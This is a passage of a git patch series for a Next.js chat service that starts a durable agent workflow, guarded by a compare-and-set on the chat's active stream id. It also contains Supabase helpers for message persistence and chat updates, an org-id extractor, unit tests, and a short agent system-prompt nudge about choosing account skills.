to `next` for + * the given chat. Domain wrapper over the generic `updateChat` helper — + * keeps the CAS-on-active_stream_id concept here (in the chat domain) + * rather than in the Supabase plumbing. + * + * Used by `/api/chat/workflow` to: + * - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-"`). + * - Promote the placeholder to the real run id after start. + * - Release a stale slot in `reconcileExistingActiveStream`. + * + * @param chatId - Target chat id. + * @param expected - The value `active_stream_id` must currently hold (null to + * require an unset slot). + * @param next - The value to write (null to release the slot). + */ +export async function compareAndSetChatActiveStreamId( + chatId: string, + expected: string | null, + next: string | null, +): Promise { + const result = await updateChat( + { id: chatId, where: { active_stream_id: expected } }, + { active_stream_id: next }, + ); + + if ("error" in result) { + return { ok: false, error: result.error }; + } + + return { ok: true, claimed: result.rowsUpdated > 0 }; +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 137f699cb..dcaad8585 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -1,31 +1,56 @@ import { NextRequest, NextResponse } from "next/server"; -import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { start, getRun } from "workflow/api"; import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; import { errorResponse } from "@/lib/networking/errorResponse"; import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import generateUUID from "@/lib/uuid/generateUUID"; +const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; + /** * Handles POST /api/chat/workflow. * - * Stub implementation: delegates auth + body validation to validateChatWorkflow, - * verifies ownership of the referenced session + chat, confirms the session's - * sandbox is active, then returns a hardcoded UIMessage stream with an - * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive - * the agent loop is wired up in a follow-up PR — this stub exists so clients - * can integrate against the contract documented at - * /api-reference/chat/workflow. + * Wires the chat UI to a durable Vercel Workflow agent loop. Flow: + * + * 1. Validate auth + body (validateChatWorkflow). + * 2. Verify session + chat ownership; ensure the session has an active sandbox. + * 3. If a workflow is already running for this chat, resume / 409 via + * maybeResumeChatStream (extracted for OCP). + * 4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using + * a `pending-` placeholder CAS. Closes the race window where two + * concurrent requests could both call `start()` and bill the model + * before one loses the CAS. + * 5. Refresh the session's lifecycle-activity timestamp + fire-and-forget + * persist the latest user message. + * 6. start(runAgentWorkflow). Replace the placeholder with the real run id + * (we already own the slot, no CAS needed). + * 7. Return the workflow's UIMessage stream with x-workflow-run-id header. + * + * If we lost the placeholder CAS in step 4, the slot is already held by + * another in-flight or pending request → 409 (no workflow was started, so + * nothing to cancel). * - * @param request - The incoming NextRequest - * @returns A streaming Response (200) or a NextResponse error. + * Tools/sandbox passing is intentionally not wired here yet — the follow-up + * PR ports the @open-harness/agent tool surface into api. + * + * @param request - The incoming NextRequest. + * @returns A streaming 200 Response or a NextResponse error. */ export async function handleChatWorkflowStream(request: NextRequest): Promise { const validated = await validateChatWorkflow(request); if (validated instanceof NextResponse) return validated; + // Session + ownership + sandbox active const sessions = await selectSessions({ id: validated.sessionId }); if (sessions === null) return errorResponse("Internal server error", 500); const session = sessions[0]; @@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise { - const id = generateUUID(); - writer.write({ type: "text-start", id }); - writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); - writer.write({ type: "text-end", id }); + // We own the slot — safe to start the workflow. + await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state)); + void persistLatestUserMessage(validated.chatId, validated.messages as never); + + const modelId = chat.model_id ?? DEFAULT_MODEL_ID; + const run = await start(runAgentWorkflow, [ + { + messages: validated.messages, + chatId: validated.chatId, + sessionId: validated.sessionId, + modelId, }, - }); + ]); + + // Promote placeholder → real run id via CAS. If something asynchronously + // stole the slot (or the DB went down) we cancel the workflow we just + // started since another stream now owns the client. + const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId); + if (!promoted.ok || !promoted.claimed) { + try { + await getRun(run.runId).cancel(); + } catch (error) { + console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error); + } + return errorResponse("Another workflow is already running for this chat", 409); + } return createUIMessageStreamResponse({ - stream, - headers: { - ...getCorsHeaders(), - "x-workflow-run-id": runId, - }, + stream: run.getReadable(), + headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId }, }); } diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts new file mode 100644 index 000000000..209113fbf --- /dev/null +++ b/lib/chat/maybeResumeChatStream.ts @@ -0,0 +1,40 @@ +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; + +/** + * Encapsulates the "is there already a workflow for this chat?" branch of + * the POST /api/chat/workflow handler. + * + * - If `activeStreamId` is unset → returns `null`; handler proceeds with + * a fresh workflow. + * - If a workflow is alive → returns a streaming `Response` that pipes + * the existing run's readable back to the client. + * - If the slot is held by a dead/transient/raced run → returns a 409 + * `Response`. + * + * Extracted from the handler so the orchestration stays small and the + * resume-vs-conflict logic can grow independently. + */ +export async function maybeResumeChatStream( + chatId: string, + activeStreamId: string | null, +): Promise { + if (!activeStreamId) return null; + + const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId); + + if (reconciled.action === "resume") { + return createUIMessageStreamResponse({ + stream: reconciled.stream as ReadableStream, + headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId }, + }); + } + + if (reconciled.action === "conflict") { + return errorResponse("Another workflow is already running for this chat", 409); + } + + return null; // action: "ready" — caller starts a new workflow. +} diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts new file mode 100644 index 000000000..73c06f5ef --- /dev/null +++ b/lib/chat/persistLatestUserMessage.ts @@ -0,0 +1,84 @@ +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +type TextPart = { type: "text"; text: string }; +type UserMessage = { id: string; role: string; parts: Array }; + +const TITLE_MAX_LENGTH = 80; +const TRUNCATION_SUFFIX = "…"; +const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; + +/** + * Fire-and-forget persistence of the latest user message in a chat-workflow + * request. Called before `start(runAgentWorkflow, ...)` so that: + * + * - A page refresh during workflow queue time still shows the user message. + * - The chat's `updated_at` reflects activity even if the workflow hasn't + * produced its first chunk yet. + * - The chat title is set from the first user message (capped at 80 chars + * including the truncation suffix, addressing the prior off-by-3 bug). + * + * Title-eligibility uses "earliest message in the chat", not "only message", + * so a fast-following second message can't race past the title-set. + * + * All failures are caught and logged — this MUST NOT block the request path. + * + * @param chatId - The target chat. + * @param messages - The full message list from the request body. + */ +export async function persistLatestUserMessage( + chatId: string, + messages: UserMessage[], +): Promise { + try { + const latest = messages[messages.length - 1]; + if (!latest || latest.role !== "user") return; + + const inserted = await upsertChatMessage({ + id: latest.id, + chat_id: chatId, + role: "user", + parts: latest as never, + }); + + // Bail on DB errors (already logged). Don't touch the chat or set a title + // since we can't confirm the message landed. + if (!inserted.ok) return; + + // If it was a duplicate, the original insert already drove side effects. + if (inserted.isDuplicate || inserted.row === null) return; + + await updateChat({ id: chatId }, { updated_at: new Date().toISOString() }); + + // Title-set is gated on "is this row still the earliest message in the chat?" + // — a fast follow-up message that landed before this query wouldn't shift + // the earliest row's id, so we'd still title from this message correctly, + // and racing in the opposite direction (this message landed second) gives + // us a different id at position 0 and we correctly skip. + const earliest = await selectChatMessages({ + chatId, + orderBy: { createdAt: "asc" }, + limit: 1, + }); + + // DB-error or no rows — bail without titling. + if (!earliest || earliest.length === 0) return; + if (earliest[0]?.id !== inserted.row.id) return; + + const text = latest.parts + .filter((part): part is TextPart => part.type === "text") + .map(part => part.text) + .join(" ") + .trim(); + if (text.length === 0) return; + + const title = + text.length > TITLE_MAX_LENGTH + ? `${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}` + : text; + await updateChat({ id: chatId }, { title }); + } catch (error) { + console.error("[persistLatestUserMessage] error:", error); + } +} diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts new file mode 100644 index 000000000..4ab004493 --- /dev/null +++ b/lib/chat/reconcileExistingActiveStream.ts @@ -0,0 +1,56 @@ +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +export type ReconcileResult = + | { action: "resume"; runId: string; stream: ReadableStream } + | { action: "ready" } + | { action: "conflict" }; + +const RUNNING_STATUSES = new Set(["running", "pending"]); + +/** + * Resolves what to do when `chats.active_stream_id` is already set at the + * start of a new chat-workflow request. + * + * - If the referenced workflow run is alive (`running` | `pending`) → + * `action: "resume"` with the existing readable. Caller pipes it back to + * the client. + * - If the run is terminally done AND we win the CAS to clear the stale id + * → `action: "ready"`. Caller starts a fresh workflow. + * - **Anything else** (workflow API throws, CAS-clear loses the race, CAS + * reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream. + * + * Safer-than-open-agents error semantics: a transient `workflow/api` failure + * does NOT clear the stale stream id (which previously created a window for + * duplicate runs). When we can't confidently say "this stream is dead", we + * refuse to start a new one. Eventually the real run completes, a subsequent + * request observes that, clears the slot, and unblocks. + */ +export async function reconcileExistingActiveStream( + chatId: string, + activeStreamId: string, +): Promise { + // Probe the workflow status. Any thrown error here is treated as transient — + // we keep the slot held rather than risk starting a duplicate run. + let status: string; + try { + const existingRun = getRun(activeStreamId); + status = await existingRun.status; + if (RUNNING_STATUSES.has(status)) { + return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() }; + } + } catch (error) { + console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error); + return { action: "conflict" }; + } + + // Run is terminally done. Attempt to clear the stale id via CAS. If we + // win → ready. Anything else (race lost OR DB error) → conflict, so we + // never accidentally start a duplicate workflow on the back of a failed + // read. + const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null); + if (cleared.ok && cleared.claimed) { + return { action: "ready" }; + } + return { action: "conflict" }; +} diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts new file mode 100644 index 000000000..93f4d2e39 --- /dev/null +++ b/lib/chat/recoupApiSkillPrompt.ts @@ -0,0 +1,11 @@ +/** + * Always-on nudge appended to the agent's system instructions. Points + * at the `recoup-api` and `artist-workspace` skills so prompts about + * anything owned by the user's Recoup account reliably load the right + * playbook — either the filesystem (for sandbox inventory and create- + * artist scaffolding) or the API (for live data) — instead of the + * agent guessing endpoint paths or interpreting overloaded nouns like + * "tasks" as generic repo TODOs. + */ +export const recoupApiSkillPrompt = + 'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.'; diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts new file mode 100644 index 000000000..c38232c4c --- /dev/null +++ b/lib/recoupable/__tests__/extractOrgId.test.ts @@ -0,0 +1,57 @@ +import { describe, it, expect } from "vitest"; +import { extractOrgId } from "@/lib/recoupable/extractOrgId"; + +describe("extractOrgId", () => { + it("extracts the UUID tail from a full clone URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a", + ), + ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); + }); + + it("strips a .git suffix before extracting", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("tolerates a trailing slash on the URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("accepts an already-extracted repo name", () => { + expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe( + "cebcc866-34c3-451c-8cd7-f63309acff0a", + ); + }); + + it("lowercases an uppercase UUID", () => { + expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe( + "80263819-9dfd-4bbf-9371-60a6185122d6", + ); + }); + + it("returns null for non-Recoupable clone URLs", () => { + expect( + extractOrgId( + "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6", + ), + ).toBeNull(); + }); + + it("returns null when the repo name has no UUID tail", () => { + expect(extractOrgId("org-rostrum-pacific")).toBeNull(); + }); + + it("returns null for malformed strings", () => { + expect(extractOrgId("")).toBeNull(); + expect(extractOrgId("not-a-url-or-repo")).toBeNull(); + }); +}); diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts new file mode 100644 index 000000000..ac30985c5 --- /dev/null +++ b/lib/recoupable/extractOrgId.ts @@ -0,0 +1,31 @@ +import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName"; + +const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i; + +/** + * Extracts the organization UUID from a Recoupable org clone URL or + * repo name. Recoupable orgs follow the convention `org--` + * in their GitHub repo names, so the UUID is always the trailing 36 chars. + * + * Used by the chat workflow handler to derive `recoupOrgId` from the + * session's clone URL — the `recoup-api` skill scopes calls to this org + * so sandbox agents see results for the sandbox's org rather than every + * org the user belongs to. + * + * @param cloneUrlOrRepoName - Either the full clone URL + * (`https://github.com/recoupable/org-foo-`) or the already-extracted + * repo name (`org-foo-`). + * @returns The lowercased UUID, or `null` for anything that doesn't match. + */ +export function extractOrgId(cloneUrlOrRepoName: string): string | null { + const repoName = cloneUrlOrRepoName.startsWith("http") + ? extractOrgRepoName(cloneUrlOrRepoName) + : cloneUrlOrRepoName; + + if (!repoName) { + return null; + } + + const match = repoName.match(UUID_TAIL_PATTERN); + return match?.[1]?.toLowerCase() ?? null; +} diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts new file mode 100644 index 000000000..c973f24df --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts @@ -0,0 +1,58 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; + +const selectChain = vi.fn(); +const eqChain = vi.fn(); +const orderChain = vi.fn(); +const limitChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ select: selectChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Allow any number of chained .eq() / .order() / .limit() calls — they all + // return the same fluent builder. + const builder = { eq: eqChain, order: orderChain, limit: limitChain }; + selectChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + orderChain.mockReturnValue(builder); + limitChain.mockReturnValue(builder); +}); + +describe("selectChatMessages", () => { + it("returns rows on success", async () => { + limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); + const result = await selectChatMessages({ + chatId: "c-1", + orderBy: { createdAt: "asc" }, + limit: 1, + }); + expect(result).toEqual([{ id: "m-1" }]); + expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1"); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true }); + expect(limitChain).toHaveBeenCalledWith(1); + }); + + it("returns null on Supabase error (so callers can distinguish from empty)", async () => { + // With no filters, the terminal call is on selectChain itself + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await selectChatMessages({}); + expect(result).toBeNull(); + }); + + it("returns [] on no match", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + const result = await selectChatMessages({ chatId: "c-1", limit: 1 }); + expect(result).toEqual([]); + }); + + it("applies desc ordering when requested", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 }); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false }); + }); +}); diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts new file mode 100644 index 000000000..0ea559058 --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; + +const upsertChain = vi.fn(); +const selectChain = vi.fn(); +const maybeSingleChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ upsert: upsertChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + upsertChain.mockReturnValue({ select: selectChain }); + selectChain.mockReturnValue({ maybeSingle: maybeSingleChain }); +}); + +const data = { + id: "msg-1", + chat_id: "chat-1", + role: "user" as const, + parts: [{ type: "text", text: "hi" }], +}; + +describe("upsertChatMessage", () => { + it("returns ok:true with the row and isDuplicate:false on new insert", async () => { + maybeSingleChain.mockResolvedValue({ data, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: data, isDuplicate: false }); + expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true }); + }); + + it("returns ok:true with isDuplicate:true when the id already existed", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: null, isDuplicate: true }); + }); + + it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: false, error: "down" }); + }); +}); diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts new file mode 100644 index 000000000..ff2ceae24 --- /dev/null +++ b/lib/supabase/chat_messages/selectChatMessages.ts @@ -0,0 +1,40 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables } from "@/types/database.types"; + +export type SelectChatMessagesFilter = { + id?: string; + chatId?: string; + /** Order by `created_at` direction. Defaults to ascending (oldest first). */ + orderBy?: { createdAt: "asc" | "desc" }; + /** Maximum rows to return. Omit for no limit. */ + limit?: number; +}; + +/** + * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions` + * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase + * error so callers can distinguish "nothing here" from "DB unreachable". + * + * Domain-specific questions ("is this the first message in the chat?") live + * in wrapper helpers under `lib/chat/` — keep this file focused on the + * read primitive. + */ +export async function selectChatMessages( + filter: SelectChatMessagesFilter = {}, +): Promise[] | null> { + let query = supabase.from("chat_messages").select("*"); + if (filter.id) query = query.eq("id", filter.id); + if (filter.chatId) query = query.eq("chat_id", filter.chatId); + if (filter.orderBy) { + query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" }); + query = query.order("id", { ascending: true }); + } + if (filter.limit !== undefined) query = query.limit(filter.limit); + + const { data, error } = await query; + if (error) { + console.error("[selectChatMessages] error:", error); + return null; + } + return data ?? []; +} diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts new file mode 100644 index 000000000..d98b9b343 --- /dev/null +++ b/lib/supabase/chat_messages/upsertChatMessage.ts @@ -0,0 +1,37 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesInsert } from "@/types/database.types"; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the + * existing `id` conflict was silently ignored. + * - `{ ok: false, error }` — Supabase failure. Visible to logs so transient + * DB problems aren't masked as duplicates. + */ +export type UpsertChatMessageResult = + | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean } + | { ok: false; error: string }; + +/** + * Insert-or-skip a single chat message row. Wraps Supabase upsert with + * `ignoreDuplicates: true` on the `id` primary key, but returns a + * discriminated result so callers can tell "duplicate skipped" apart from + * "DB error" — the previous helper returned `null` for both, which made + * callers silently swallow operational failures. + */ +export async function upsertChatMessage( + data: TablesInsert<"chat_messages">, +): Promise { + const { data: row, error } = await supabase + .from("chat_messages") + .upsert(data, { onConflict: "id", ignoreDuplicates: true }) + .select() + .maybeSingle(); + + if (error) { + console.error("[upsertChatMessage] error:", error); + return { ok: false, error: error.message }; + } + + return { ok: true, row, isDuplicate: row === null }; +} diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts new file mode 100644 index 000000000..a0edc247b --- /dev/null +++ b/lib/supabase/chats/__tests__/updateChat.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +const updateChain = vi.fn(); +const eqChain = vi.fn(); +const matchChain = vi.fn(); +const isChain = vi.fn(); +const selectChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ update: updateChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Fluent builder mock — every method returns the same builder so we can + // chain .eq / .match / .is / .select in any order without per-step setup. + const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain }; + updateChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + matchChain.mockReturnValue(builder); + isChain.mockReturnValue(builder); +}); + +describe("updateChat", () => { + describe("plain update (no where predicate)", () => { + it("returns ok:true with rowsUpdated and the row on success", async () => { + const row = { id: "chat-1", title: "renamed" }; + selectChain.mockResolvedValue({ data: [row], error: null }); + const result = await updateChat({ id: "chat-1" }, { title: "renamed" }); + expect(result.ok).toBe(true); + if (!result.ok) return; + expect(result.rowsUpdated).toBe(1); + expect(result.row).toEqual(row); + expect(updateChain).toHaveBeenCalledWith({ title: "renamed" }); + expect(eqChain).toHaveBeenCalledWith("id", "chat-1"); + // With no where filter, match is called with an empty object. + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("returns ok:false with error on Supabase failure", async () => { + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await updateChat({ id: "chat-x" }, { title: "x" }); + expect(result.ok).toBe(false); + if (result.ok) return; + expect(result.error).toBe("down"); + }); + }); + + describe("generic where predicate", () => { + it("emits `is null` for null values (e.g. CAS expecting unset)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + // No non-null fields → match called with empty {} + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("emits `match()` for non-null values (e.g. CAS expecting a specific run id)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: "wrun_new" }, + ); + expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" }); + // No null fields → is() not called + expect(isChain).not.toHaveBeenCalled(); + }); + + it("AND-s nullable + equality where columns together", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } }, + { title: "x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" }); + }); + + it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => { + selectChain.mockResolvedValue({ data: [], error: null }); + const result = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + }); + + it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => { + selectChain.mockResolvedValueOnce({ data: [], error: null }); + const raceLost = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + + selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } }); + const dbError = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" })); + }); + }); +}); diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts new file mode 100644 index 000000000..63cd2064b --- /dev/null +++ b/lib/supabase/chats/updateChat.ts @@ -0,0 +1,86 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesUpdate } from "@/types/database.types"; + +/** + * Subset of `chats` columns that callers are permitted to mutate via this + * helper. Explicitly excludes structural fields (`id`, `session_id`, + * `created_at`) so generic updates cannot bypass chat invariants. + */ +export type ChatMutableFields = Pick< + TablesUpdate<"chats">, + "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at" +>; + +/** + * Filter accepted by {@link updateChat}. Always matches by `id`. Optional + * `where` adds AND-ed predicates per column — generic across columns so + * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their + * own wrapper helpers rather than baking into the Supabase plumbing. + * + * Each `where` entry maps to `column = value` (or `column IS NULL` when + * `value === null`). + */ +export type UpdateChatFilter = { + id: string; + where?: Partial>; +}; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, rowsUpdated: 1 }` — updated as intended. + * - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS + * race lost, or `id` not found). + * - `{ ok: false, error }` — Supabase / network failure. + */ +export type UpdateChatResult = + | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null } + | { ok: false; error: string }; + +/** + * Updates a `chats` row by id, optionally constrained by a generic `where` + * predicate. Returns a discriminated result so callers can tell + * "predicate didn't match" (a race lost) from "Supabase failure" (operational + * issue) — the previous behavior of returning `false` for both was a CAS bug. + */ +export async function updateChat( + filter: UpdateChatFilter, + updates: ChatMutableFields, +): Promise { + // Split the optional `where` map into nullable vs equality predicates so we + // can apply each as a single chained call (`.match()` for equalities, + // `.is(col, null)` per nullable). Iterating with `let query = ...` and + // reassigning in a for-loop confuses Supabase's deeply generic builder + // types ("type instantiation is excessively deep") in the Next.js build. + const entries = Object.entries(filter.where ?? {}); + const equalityMatches: Record = {}; + const nullColumns: string[] = []; + for (const [column, value] of entries) { + if (value === null) { + nullColumns.push(column); + } else { + equalityMatches[column] = value; + } + } + + const baseQuery = supabase + .from("chats") + .update(updates) + .eq("id", filter.id) + .match(equalityMatches); + const finalQuery = nullColumns.reduce( + (q, column) => q.is(column, null) as typeof baseQuery, + baseQuery, + ); + + const { data, error } = await finalQuery.select(); + if (error) { + console.error("[updateChat] error:", error); + return { ok: false, error: error.message }; + } + + return { + ok: true, + rowsUpdated: data?.length ?? 0, + row: data?.[0] ?? null, + }; +} From dcddcbffabe284f8c9b577ecefc7961174e16a49 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 13:12:07 -0500 Subject: [PATCH 3/5] feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's 